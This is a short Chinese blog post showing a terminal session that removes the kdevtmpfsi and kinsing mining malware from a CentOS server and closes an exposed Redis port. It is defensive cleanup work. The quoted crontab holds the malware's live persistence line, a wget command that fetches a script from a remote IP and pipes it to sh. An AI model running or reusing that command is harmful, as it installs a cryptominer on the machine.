清理云服务器挖矿病毒kdevtmpfsi和kinsing 

[root@VM-12-13-centos step-gateway]# crontab -l
# secu-tcs-agent monitor, install at Sun Mar 13 17:00:40 CST 2022
* * * * * /usr/local/sa/agent/secu-tcs-agent-mon-safe.sh > /dev/null 2>&1
* * * * * wget -q -O - http://185.122.204.197/scg.sh | sh > /dev/null 2>&1
[root@VM-12-13-centos step-gateway]# crontab -e
crontab: installing new crontab
[root@VM-12-13-centos step-gateway]# crontab -l
# secu-tcs-agent monitor, install at Sun Mar 13 17:00:40 CST 2022
* * * * * /usr/local/sa/agent/secu-tcs-agent-mon-safe.sh > /dev/null 2>&1
[root@VM-12-13-centos step-gateway]# ps -aux | grep kdevtmpfsi
root      359186  0.0  0.0 308016  2412 ?        Ssl  23:22   0:00 /tmp/kdevtmpfsi
root      359692  0.0  0.0  12136  1100 pts/0    S+   23:25   0:00 grep --color=auto kdevtmpfsi
[root@VM-12-13-centos step-gateway]# ps -aux | grep kinsing
root      332241  0.0  0.7 710608 28072 ?        Sl   20:56   0:01 /etc/kinsing
root      359710  0.0  0.0  12136  1124 pts/0    S+   23:25   0:00 grep --color=auto kinsing
[root@VM-12-13-centos step-gateway]# kill -9 332241
[root@VM-12-13-centos step-gateway]# kill -9 359186
[root@VM-12-13-centos step-gateway]# rm -f /tmp/kdevtmpfsi /etc/kinsing 
[root@VM-12-13-centos step-gateway]# ps -aux | grep kdevtmpfsi
root      360008  0.0  0.0  12136  1160 pts/0    S+   23:27   0:00 grep --color=auto kdevtmpfsi
[root@VM-12-13-centos step-gateway]# ps -aux | grep kinsing
root      360017  0.0  0.0  12136  1156 pts/0    S+   23:27   0:00 grep --color=auto kinsing
[root@VM-12-13-centos step-gateway]#


[root@VM-12-13-centos ~]# firewall-cmd --zone=public --list-ports
80/tcp 443/tcp 22/tcp 8848/tcp 6379/tcp
[root@VM-12-13-centos ~]# firewall-cmd --zone=public --remove-port=6379/tcp --permanent
success
[root@VM-12-13-centos ~]# firewall-cmd --reload
success
[root@VM-12-13-centos ~]# firewall-cmd --zone=public --list-ports
80/tcp 443/tcp 22/tcp 8848/tcp

 

posted @ 2023-02-01 23:30  狱婪  阅读(925)  评论(0编辑  收藏  举报